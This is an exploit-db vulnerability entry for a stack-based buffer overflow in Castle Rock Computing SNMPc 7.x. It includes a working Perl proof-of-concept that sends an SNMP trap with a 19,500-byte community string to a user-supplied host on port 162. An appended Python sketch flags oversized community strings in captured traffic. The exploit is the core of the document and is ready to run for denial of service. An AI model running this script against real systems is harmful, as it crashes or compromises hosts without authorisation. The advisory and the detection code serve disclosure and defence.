Castle Rock Computing SNMPc <= 7.0.19 - Community String Stack Based Buffer Overflow Vulnerability

11 Nov 2008 00:00:00 | Reported by Praveen Darshanam | Type: exploitdb | www.exploit-db.com | 50 Views

source: http://www.securityfocus.com/bid/28990/info

Castle Rock Computing SNMPc is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

Attackers can leverage this issue to execute arbitrary code in the context of the application, which typically runs with LocalSystem privileges. Successful exploits will compromise affected computers. Failed attacks will likely cause denial-of-service conditions.

Versions prior to SNMPc 7.1.1 are vulnerable. 

#!usr/bin/perl -w

################################################################################################################
#    Stack-based buffer overflow in the Network Manager in Castle Rock Computing SNMPc 7.1 and
#    earlier allows remote attackers to cause a denial of service (crash) or execute arbitrary code
#    via a long community string in an SNMP TRAP packet.
#
#    Refer:
#    http://web.nvd.nist.gov/view/vuln/detail?execution=e3s1
#    http://www.securityfocus.com/bid/28990/discuss
#
#
#    To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w"
#    (say #!C:/Program Files/Perl/bin/perl -w)
#
#    This was strictly written for educational purposes. Use it at your own risk.
#    Author will not bear any responsibility for any damages whatsoever.
#
#        Author:    Praveen Darshanam
#        Email:    praveen[underscore]recker[at]sify.com
#        Date:    11th November, 2008
#
#    NOTE:    Thanks to all my colleagues at iPolicy
#            For reliable security solutions please visit http://www.ipolicynetworks.com/
#
##################################################################################################################

use Net::SNMP;

printf("Enter the IP Address of Vulnerable SNMP Manager ");
$host_vulnerable = <STDIN>;
$port = 162;
$community = "D" x 19500;

($session, $error) = Net::SNMP->session(
    -hostname   => $host_vulnerable,
    -port       => $port,
    -community  => $community,   # v1/v2c
    -maxmsgsize => 65535,
);
 if (!defined($session))
 {
      printf("ERROR: %s.\n", $error);
      exit 1;
 }

$ipaddress = "172.16.16.4";
#Throwing an error without Agent so randomly assigned value to $ipaddress

$result = $session->trap(
                              -agentaddr       => $ipaddress,
                           );

if (!defined($result))
{
     printf("ERROR: %s.\n", $session->error);
     $session->close;
     exit 1;
}

$session->close;
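
Added detection example (not part of the original advisory or the exploit-db entry): a Python check that decodes the BER header of a UDP/162 payload and flags an SNMP v1/v2c message whose community string is abnormally long, the condition this advisory describes. The function names and the 64-byte MAX_COMMUNITY threshold are assumptions made for this sketch, not values from the advisory or the SNMP specification.

```python
MAX_COMMUNITY = 64  # assumed site policy, not a protocol limit or a value from the advisory


def read_tlv(buf, pos):
    """Decode one BER tag/length header; return (tag, length, offset of value)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:                      # short form: length fits in one byte
        return tag, first, pos
    n = first & 0x7F                      # long form: next n bytes hold the length
    if n == 0 or n > 4 or pos + n > len(buf):
        raise ValueError("unsupported or truncated length")
    return tag, int.from_bytes(buf[pos:pos + n], "big"), pos + n


def community_length(datagram):
    """Return the declared community length of an SNMP v1/v2c message."""
    tag, _, pos = read_tlv(datagram, 0)             # outer SEQUENCE
    vtag, vlen, pos = read_tlv(datagram, pos)       # version INTEGER
    ctag, clen, _ = read_tlv(datagram, pos + vlen)  # community OCTET STRING
    if (tag, vtag, ctag) != (0x30, 0x02, 0x04):
        raise ValueError("not an SNMP v1/v2c message header")
    return clen


def classify(datagram):
    """Return 'ok', 'oversized-community' or 'malformed' for one UDP payload."""
    try:
        n = community_length(datagram)
    except ValueError:
        return "malformed"
    return "oversized-community" if n > MAX_COMMUNITY else "ok"


def ber_len(n):
    """Encode a BER length (helper for building the constructed samples)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def sample(community):
    """Constructed SNMPv1 header (version + community, PDU omitted) for testing."""
    inner = b"\x02\x01\x00" + b"\x04" + ber_len(len(community)) + community
    return b"\x30" + ber_len(len(inner)) + inner
```

The check reads the declared length only, so it should run on reassembled UDP payloads; a datagram that carries a community of this size exceeds a typical MTU and arrives as IP fragments.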

11 Nov 2008 00:00 (current) | Vulners AI Score: 1.1 (Low risk) | CVSS 2: 10 | EPSS: 0.18693